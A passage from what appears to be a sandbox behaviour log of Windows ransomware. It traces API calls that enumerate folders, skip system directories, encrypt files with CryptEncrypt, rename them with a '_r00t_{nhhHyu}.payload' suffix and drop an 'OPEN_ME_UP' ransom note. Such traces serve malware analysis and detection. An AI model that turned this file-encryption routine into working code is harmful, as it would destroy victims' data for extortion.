nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.718] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.718] CloseHandle (hObject=0x438) returned 1 [0058.719] GetProcessHeap () returned 0x5e0000 [0058.719] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.719] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.721] GetProcessHeap () returned 0x5e0000 [0058.721] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.721] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.721] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.721] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.721] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.721] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.721] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.721] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 48 [0058.721] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.721] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.721] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.721] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.721] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.721] GetTickCount () returned 0x114f1e3 [0058.721] GetTickCount () returned 0x114f1e3 [0058.721] GetTickCount () returned 0x114f1e3 [0058.721] GetTickCount () returned 0x114f1e3 [0058.721] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.721] GetProcessHeap () returned 0x5e0000 [0058.721] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.721] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.723] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.723] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.724] GetProcessHeap () returned 0x5e0000 [0058.724] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.724] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.724] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.724] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.724] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.724] CloseHandle (hObject=0x438) returned 1 [0058.727] GetProcessHeap () returned 0x5e0000 [0058.727] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.727] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.727] GetProcessHeap () returned 0x5e0000 [0058.727] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.727] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.728] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 49 [0058.728] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.728] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.728] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.728] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.728] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.729] GetTickCount () returned 0x114f1f3 [0058.729] GetTickCount () returned 0x114f1f3 [0058.729] GetTickCount () returned 0x114f1f3 [0058.729] GetTickCount () returned 0x114f1f3 [0058.729] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.729] GetProcessHeap () returned 0x5e0000 [0058.729] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.729] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.731] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.731] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.731] GetProcessHeap () returned 0x5e0000 [0058.731] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.731] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.731] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.732] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.732] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.732] CloseHandle (hObject=0x438) returned 1 [0058.733] GetProcessHeap () returned 0x5e0000 [0058.733] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.733] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.733] GetProcessHeap () returned 0x5e0000 [0058.733] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.733] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.733] FindClose (in: hFindFile=0x606420 | out: hFindFile=0x606420) returned 1 [0058.734] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1035\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.734] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1035\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.734] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.735] CloseHandle (hObject=0x430) returned 1 [0058.735] GetProcessHeap () returned 0x5e0000 [0058.735] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.735] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1036", cAlternateFileName="")) returned 1 [0058.735] lstrcmpiW (lpString1="1036", lpString2="Windows") returned -1 [0058.735] lstrcmpiW (lpString1="1036", lpString2="$Recycle.bin") returned 1 [0058.735] lstrcmpiW (lpString1="1036", lpString2="System Volume Information") returned -1 [0058.736] lstrcmpiW (lpString1="1036", lpString2="Program Files") returned -1 [0058.736] lstrcmpiW (lpString1="1036", lpString2="Program Files (x86)") returned -1 [0058.736] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036") returned 30 [0058.736] lstrcmpW (lpString1="1036", lpString2=".") returned 1 [0058.736] lstrcmpW (lpString1="1036", lpString2="..") returned 1 [0058.736] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.736] GetProcessHeap () returned 0x5e0000 [0058.736] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.736] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\*") returned 32 [0058.736] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6065a0 [0058.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.811] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.811] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.811] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.811] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.811] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\.") returned 32 [0058.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.811] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.811] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.811] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.811] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.811] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.811] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.811] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\..") returned 33 [0058.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.811] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.811] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.811] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.811] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.811] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.811] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.811] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 39 [0058.811] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.812] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.812] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.812] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.812] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.812] GetTickCount () returned 0x114f241 [0058.812] GetTickCount () returned 0x114f241 [0058.812] GetTickCount () returned 0x114f241 [0058.812] GetTickCount () returned 0x114f241 [0058.812] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.812] GetProcessHeap () returned 0x5e0000 [0058.812] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.812] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xdc6, lpOverlapped=0x0) returned 1 [0058.814] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff23a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.814] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xdc6, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xdc6, lpOverlapped=0x0) returned 1 [0058.814] GetProcessHeap () returned 0x5e0000 [0058.814] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.814] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.814] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.814] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.814] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.814] CloseHandle (hObject=0x438) returned 1 [0058.815] GetProcessHeap () returned 0x5e0000 [0058.815] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.815] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.817] GetProcessHeap () returned 0x5e0000 [0058.817] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.817] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.817] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.817] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.817] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.817] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.817] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.817] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 48 [0058.818] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.818] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.818] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.818] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.818] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.818] GetTickCount () returned 0x114f241 [0058.818] GetTickCount () returned 0x114f241 [0058.818] GetTickCount () returned 0x114f241 [0058.818] GetTickCount () returned 0x114f241 [0058.818] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.818] GetProcessHeap () returned 0x5e0000 [0058.818] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.818] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.820] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.821] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.821] GetProcessHeap () returned 0x5e0000 [0058.821] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.821] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.821] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, 